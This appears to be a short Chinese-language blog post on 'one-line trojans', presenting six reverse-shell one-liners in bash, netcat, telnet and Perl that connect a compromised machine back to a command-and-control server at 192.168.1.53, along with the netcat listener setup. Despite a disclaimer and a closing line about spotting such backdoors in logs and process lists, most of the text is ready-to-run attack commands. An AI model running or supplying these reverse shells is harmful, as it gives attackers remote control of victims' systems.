注意:本文章只做网络安全技术交流使用,切莫用来做坏事。
也可以叫一句话木马,一个意思。
设置监听
回连端口可以用 ncat 工具。此处用 192.168.1.53 作为CC服务端的示例,这些后门回连到此服务器。
例如,在CC服务器上运行:nc -lvnp 5555 则监听5555端口,作为后门的回连端口。
第一种方法:
bash -i >&/dev/tcp/192.168.1.53/5555 0>&1
第二种方法:
nc -e /bin/bash 192.168.1.53 5555
第三种方法:
exec 5<>/dev/tcp/192.168.1.53/5555 ; cat <&5 | while read line ; do $line 2>&5 >&5 ; done
第四种方法:
telnet 192.168.1.53 5555 | /bin/bash | telnet 192.168.1.53 6666
5555端口输入,6666端口输出。此处需要 ncat 在CC服务器监听两个端口
第五种方法:
perl -e 'use Socket;$i="192.168.1.53";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
第六种方法:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.1.53:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
还有别的方法,可以自己探索。虽然方法比较多,但是基本原理都一样。在 肉鸡 上回连到 CC 服务器,把输入输出重定向到 回连CC服务器的tcp连接中;CC 发送的数据,用shell(bash、dash等)脚本执行后,把指令结果返回给 CC 服务器。这样一个简单的后门就成了。
这种后门还是比较好检测的,自己运行一下,从操作历史记录、进程、端口连接、系统日志中找一些特征就可以识别到此后门。快检查一下自己服务器上有没有这些后门吧。
发表回复